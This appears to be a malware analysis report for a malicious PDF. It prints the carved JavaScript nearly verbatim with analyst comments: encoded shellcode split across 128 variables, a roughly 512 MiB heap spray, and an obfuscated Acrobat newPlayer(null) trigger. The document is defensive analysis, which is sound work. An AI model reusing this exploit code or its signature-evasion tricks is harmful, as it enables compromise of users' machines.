Malicious PDF — malware analysis report

Static analysis result for SHA-256 59d5935299c7d105…

MALICIOUS

PDF

8.4 KB Created: 2009-12-17 16:59:10 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-10
MD5: 6870e40aa5baa6bcec88825d223b46aa SHA-1: 0985d8564191f31993e181a7f0b677a84e7224ca SHA-256: 59d5935299c7d105f8073db9461549a1408293be06265d2201ab7ea36aa9cf04
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream is obfuscated, as evidenced by the PDF_UNESCAPE heuristic firing and the presence of 'unescape()' calls in the script. The extracted artifact 'javascript_obj0021_000.js' indicates that the script is designed to execute malicious code. The exact intent of the script is unclear because of the obfuscation, but it is likely to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var asdsadas=unescape("%"+aadd1+"%"+aadd2+"%"+aadd3+"%"+aadd4+"%"+aadd5+"%"+aadd6+"%"+aadd7+"%"+aadd8+"%"+aadd9+"%"+aadd10+"%"+aadd11+"%"+aadd12+"%"+aadd13+"%"+aadd14+"%"+aadd15+"%"+aadd16+"%"+aadd17+"%"+aadd18+"%"+aadd19+"%"+aadd20+"%"+aadd21+"%"+aadd22+"%"+aadd23+"%"+aadd24+"%"+aadd25+"%"+aadd26+"%"+aadd27+"%"+aadd28+"%"+aadd29+"%"+aadd30+"%"+aadd31+"%"+aadd32+"%"+aadd33+"%"+aadd34+"%"+aadd35+"%"+aadd36+"%"+aadd37+"%"+aadd38+"%"+aadd39+"%"+aadd40+"%"+aadd41+"%"+aadd42+"%"+aadd43+"%"+aadd44+"%" …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0021_000.js pdf-javascript-stream PDF /JS object 21 at offset 0x1883 5034 bytes
SHA-256: c4bb5e96dedf364f20c7b0a0e8fcd6d3fb7a5a2794fc2bc529f298b1c4cd234b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Stage 1: payload assembly and memory fill (analyst annotations only; code is verbatim).
//
// aadd1..aadd128 each hold one 16-bit value as "uXXXX" (no leading '%').  Line 178
// prefixes every fragment with "%" and passes the concatenation to unescape(), which
// turns the 128 "%uXXXX" sequences into a 128-code-unit binary string (asdsadas).
// Splitting the escapes across 128 variables keeps the "%u" marker out of every
// string literal, which is why simple literal-matching signatures miss it; the
// PDF_JS_EXPLOIT_CLUSTER heuristic keyed on the unescape() line instead.
// aadd115..aadd128 are all "u0000", i.e. the blob ends in 14 zero code units of padding.
var aadd1 = "ucada";
var aadd2 = "ub6bd";
var aadd3 = "uaaad";
var aadd4 = "ud94a";
var aadd5 = "u2474";
var aadd6 = "u29f4";
var aadd7 = "ub1c9";
var aadd8 = "u5e33";
var aadd9 = "uee83";
var aadd10 = "u31fc";
var aadd11 = "u136e";
var aadd12 = "ud803";
var aadd13 = "u48be";
var aadd14 = "ud8bf";
var aadd15 = "u0529";
var aadd16 = "u2040";
var aadd17 = "u76aa";
var aadd18 = "uc5c8";
var aadd19 = "ua49b";
var aadd20 = "u8eae";
var aadd21 = "u788e";
var aadd22 = "uc2a4";
var aadd23 = "uf222";
var aadd24 = "uf6e8";
var aadd25 = "u76b1";
var aadd26 = "uf925";
var aadd27 = "u3c72";
var aadd28 = "u3413";
var aadd29 = "uf082";
var aadd30 = "u9a9b";
var aadd31 = "u9240";
var aadd32 = "ue067";
var aadd33 = "u7494";
var aadd34 = "u2b59";
var aadd35 = "u75e9";
var aadd36 = "u519e";
var aadd37 = "u2702";
var aadd38 = "u1e77";
var aadd39 = "ud8b1";
var aadd40 = "u62fc";
var aadd41 = "ud80a";
var aadd42 = "ue9d2";
var aadd43 = "ua232";
var aadd44 = "u2d57";
var aadd45 = "u18c6";
var aadd46 = "u7d59";
var aadd47 = "u1677";
var aadd48 = "u6511";
var aadd49 = "u70f3";
var aadd50 = "u9482";
var aadd51 = "u62d0";
var aadd52 = "udffe";
var aadd53 = "u505d";
var aadd54 = "ude74";
var aadd55 = "ua8b7";
var aadd56 = "ud175";
var aadd57 = "u67f7";
var aadd58 = "ude48";
var aadd59 = "u76f5";
var aadd60 = "ud88c";
var aadd61 = "u0ce5";
var aadd62 = "u1be6";
var aadd63 = "u169b";
var aadd64 = "u663d";
var aadd65 = "u9247";
var aadd66 = "uc0a0";
var aadd67 = "u040c";
var aadd68 = "uf101";
var aadd69 = "ud3c1";
var aadd70 = "ufdc2";
var aadd71 = "u90ae";
var aadd72 = "ue18d";
var aadd73 = "u7431";
var aadd74 = "u1da6";
var aadd75 = "u7bb9";
var aadd76 = "u9469";
var aadd77 = "u5ff9";
var aadd78 = "ufdad";
var aadd79 = "uc15a";
var aadd80 = "u5bf4";
var aadd81 = "ufe0c";
var aadd82 = "u03e7";
var aadd83 = "u5af1";
var aadd84 = "ua163";
var aadd85 = "udde6";
var aadd86 = "uaf2e";
var aadd87 = "u6cf9";
var aadd88 = "u9655";
var aadd89 = "u6efa";
var aadd90 = "ub856";
var aadd91 = "u5f92";
var aadd92 = "u57dd";
var aadd93 = "u5fe4";
var aadd94 = "u1c34";
var aadd95 = "u2a1a";
var aadd96 = "u3415";
var aadd97 = "uf3b3";
var aadd98 = "u05cf";
var aadd99 = "u03de";
var aadd100 = "u493a";
var aadd101 = "u87e7";
var aadd102 = "u31cf";
var aadd103 = "u971c";
var aadd104 = "u34a5";
var aadd105 = "u1f58";
var aadd106 = "u4455";
var aadd107 = "ucaf1";
var aadd108 = "ufb59";
var aadd109 = "udef2";
var aadd110 = "u9a39";
var aadd111 = "u8260";
var aadd112 = "u3993";
var aadd113 = "u2101";
var aadd114 = "u41ec";
// Zero padding (aadd115..aadd128).
var aadd115 = "u0000";
var aadd116 = "u0000";
var aadd117 = "u0000";
var aadd118 = "u0000";
var aadd119 = "u0000";
var aadd120 = "u0000";
var aadd121 = "u0000";
var aadd122 = "u0000";
var aadd123 = "u0000";
var aadd124 = "u0000";
var aadd125 = "u0000";
var aadd126 = "u0000";
var aadd127 = "u0000";
var aadd128 = "u0000";
// Decode: 128 fragments -> one 128-code-unit binary string.  This is the line the
// report's "Matched line in script" entry refers to.
var asdsadas=unescape("%"+aadd1+"%"+aadd2+"%"+aadd3+"%"+aadd4+"%"+aadd5+"%"+aadd6+"%"+aadd7+"%"+aadd8+"%"+aadd9+"%"+aadd10+"%"+aadd11+"%"+aadd12+"%"+aadd13+"%"+aadd14+"%"+aadd15+"%"+aadd16+"%"+aadd17+"%"+aadd18+"%"+aadd19+"%"+aadd20+"%"+aadd21+"%"+aadd22+"%"+aadd23+"%"+aadd24+"%"+aadd25+"%"+aadd26+"%"+aadd27+"%"+aadd28+"%"+aadd29+"%"+aadd30+"%"+aadd31+"%"+aadd32+"%"+aadd33+"%"+aadd34+"%"+aadd35+"%"+aadd36+"%"+aadd37+"%"+aadd38+"%"+aadd39+"%"+aadd40+"%"+aadd41+"%"+aadd42+"%"+aadd43+"%"+aadd44+"%"+aadd45+"%"+aadd46+"%"+aadd47+"%"+aadd48+"%"+aadd49+"%"+aadd50+"%"+aadd51+"%"+aadd52+"%"+aadd53+"%"+aadd54+"%"+aadd55+"%"+aadd56+"%"+aadd57+"%"+aadd58+"%"+aadd59+"%"+aadd60+"%"+aadd61+"%"+aadd62+"%"+aadd63+"%"+aadd64+"%"+aadd65+"%"+aadd66+"%"+aadd67+"%"+aadd68+"%"+aadd69+"%"+aadd70+"%"+aadd71+"%"+aadd72+"%"+aadd73+"%"+aadd74+"%"+aadd75+"%"+aadd76+"%"+aadd77+"%"+aadd78+"%"+aadd79+"%"+aadd80+"%"+aadd81+"%"+aadd82+"%"+aadd83+"%"+aadd84+"%"+aadd85+"%"+aadd86+"%"+aadd87+"%"+aadd88+"%"+aadd89+"%"+aadd90+"%"+aadd91+"%"+aadd92+"%"+aadd93+"%"+aadd94+"%"+aadd95+"%"+aadd96+"%"+aadd97+"%"+aadd98+"%"+aadd99+"%"+aadd100+"%"+aadd101+"%"+aadd102+"%"+aadd103+"%"+aadd104+"%"+aadd105+"%"+aadd106+"%"+aadd107+"%"+aadd108+"%"+aadd109+"%"+aadd110+"%"+aadd111+"%"+aadd112+"%"+aadd113+"%"+aadd114+"%"+aadd115+"%"+aadd116+"%"+aadd117+"%"+aadd118+"%"+aadd119+"%"+aadd120+"%"+aadd121+"%"+aadd122+"%"+aadd123+"%"+aadd124+"%"+aadd125+"%"+aadd126+"%"+aadd127+"%"+aadd128);

// Filler block: n starts as a 2-code-unit string and is doubled (line 185) until it
// exceeds 0x8000 code units, then cut (line 186) to 0x8000 - asdsadas.length so that
// n + asdsadas is exactly 0x8000 UTF-16 code units (64 KiB) long.
var n = unescape("%u3f42%u3792"); 
var xxx = 0x8000;
// sasf, asf and gsdgsd are only string pieces; they are glued together at the end of
// the script (the util.printd call) to form "p@" followed by a long run of zeros.
var sasf = "p";
var asf = "@";
var gsdgsd = "000000000000000";
while(n.length <= xxx) n += n;
n = n.substring(0, 0x8000 - asdsadas.length); 

var memory = new Array();

// 0x2000 (8192) copies of the 64 KiB filler+payload string are kept alive in an array,
// i.e. roughly 512 MiB of identical blocks -- the fill-and-repeat layout typical of a
// heap spray.  `i` is assigned without a declaration and becomes an implicit global.
// The large, uniform allocation is itself a useful dynamic-analysis indicator.
for(i = 0; i < 0x2000; i++)  memory[i] = n + asdsadas;
// Wraps `input` (source text, not a value) in a try/catch so that, if the result is
// later evaluated, any exception from the wrapped statement is silently discarded.
// Returns the string "try{" + input + "}catch(e){}".
function retunU(input){	return "try{"+input+"}catch(e){}";}
// Misnamed: adds no quotes.  Splices `input` between "this.media.ne" and "yer(null);";
// with the caller's argument 'wPla' this yields the source text
// "this.media.newPlayer(null);".  Splitting the method name this way keeps
// "newPlayer" out of every string literal, so a signature for that API name must
// match on the reconstructed text, not on the raw script.
function addQuotes(input){	return "this.media.ne"+input+"yer(null);";}
// Hands the assembled source string to `evdal`.  NOTE(review): `evdal` is not defined
// anywhere in the carved script, so as written this call throws a ReferenceError and
// nothing after it runs; it reads like a one-letter alteration of `eval` (which would
// execute the string as code), but whether that is an author typo or a sandbox
// defang cannot be determined from the carved text -- confirm against the raw stream.
function ex_Needed_Func(assdsaf){evdal(assdsaf);}
// The missing middle of the split method name: "this.media.ne" + 'wPla' + "yer(null);".
var FromCak ='wPla';

	
// Builds "try{this.media.newPlayer(null);}catch(e){}" and passes it to ex_Needed_Func.
// this.media.newPlayer is an Acrobat/Reader JavaScript API, not browser JavaScript;
// presumably this is the trigger for the sprayed payload above -- confirm against the
// Reader version being targeted.  If `evdal` is undefined (see ex_Needed_Func) this
// line throws and the util.printd call below is never reached.
ex_Needed_Func(retunU(addQuotes(FromCak)));



// util.printd is likewise an Acrobat/Reader API.  The first argument is assembled from
// the fragments declared earlier and evaluates to "p@" followed by 24 zeros, then
// " : pppp000"; the Date argument is only there to satisfy the signature.  The
// fragment-assembled format string and the newPlayer(null) call are the two values a
// detection rule for this sample should key on, since neither appears intact in the source.
util.printd(sasf+asf+gsdgsd+"000000000 : pppp000", new Date());